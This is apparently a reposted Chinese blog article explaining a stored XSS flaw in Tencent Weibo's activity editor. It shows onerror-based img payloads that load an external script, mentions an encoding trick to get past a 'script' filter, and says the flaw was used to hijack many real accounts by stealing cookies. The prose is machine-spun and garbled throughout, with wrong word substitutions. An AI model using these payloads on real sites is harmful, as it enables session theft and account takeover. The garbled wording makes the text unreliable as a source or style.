|
|
|
联系客服020-83701501

xss的科普扫盲[第一章]

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
xss的科普扫盲[第一章]

这个洞是老早以前我和一个基友发的了,首要不是流露裂缝,而是科普,归正洞早就补了~~~
在过来,腾讯微博有一个坚守叫做微活动,这个xss就是微活动引起的了,在编辑活动模式中减少图片并通过Firefox的神器firebug减少事故即可败北操作该存储型xss。
1.png
如上图,编辑html后在img标签里减少事故,并写入收信平台的地址,因为这里过来测试的时分有个效过滤,就通过编码绕过了,过滤模式为“script”
上面是科普模式:
0x01 什么叫做onerror事故
onerror 事故会在文档或图象加载过程中发生舛讹时被触发。此处我们就是在图片加载的过程中操作的oonerror事故
语法以下

Default
1     onerror="SomeJavaScriptCode"

?

分别
<img>, <object>, <style>这些标签都概略操作该事故
window, image这些javascript器材均反对该事故
举个例子:
比喻

Default
1     &lt;img src="图片地址" onerror="alert('加载出错.')" /&gt;

 

当图片载入出错的时分就会弹出个框“加载出错”,这个本身概略自身就试试~
如:

Default
123456 &lt;html&gt;&lt;body&gt;&lt;img src="image.gif"onerror="alert('因为没有这个图片,所以加载出错.')"&gt;&lt;/body&gt;&lt;/html&gt;

 

0x02 通过onerror事故xss

Default
1 &lt;img src="x" onerror=eval("xxxxxxxx")&gt;&lt;/img&gt;

 

Default
1 onerror="with(document)body.appendChild(createElement('script')).src='xxxxxxxxx'"

 
Default
1 &lt;img src=x onerror='javascript:document.write("&lt;script src=xxxxxxxxxxx&gt;&lt;/script&gt;")'&gt;&lt;/img&gt;

 

这几个凡是操作onerror事故中断xss的,就是说,只要惬心onerror的基础语法,怎么x都行

————————- 呵呵呵呵呵的朋分线 —————————
起初操作这个xss劫持了蛮多的微博帐号,操作目标就是很地道的cookies劫持,获得用户权限.
如果你还想熟谙更多该事故的用法,请看此处(描写DOM Event器材的)因为onerror是该器材的一员以及此处,描写onerror底子常识,讲的比我具体.
总结:xss照旧很风雅的,只要思路淫荡,怎么着操作都成,就像我举得这个例子,原本地道减少图片不大约会有onerror事故的,但是不知道你有无注意到,该处腾讯的考据机制是全局的html编辑实现后点下一步才提交的任事器,就是说我概略在他考据过来在我的前端轻易编辑好后再提交,所以形成了这个存储型xss.

干系文章推荐:《蠕虫来了-小议xss worm》

link:http://bbs.blackbap.org/thread-4160-1-1.html 作者:我可帅了

本文由Internet平安攻防研究室(www.91ri.org)静态平安小组收集整理,转载请阐明来因。

数安新闻+更多

证书相关+更多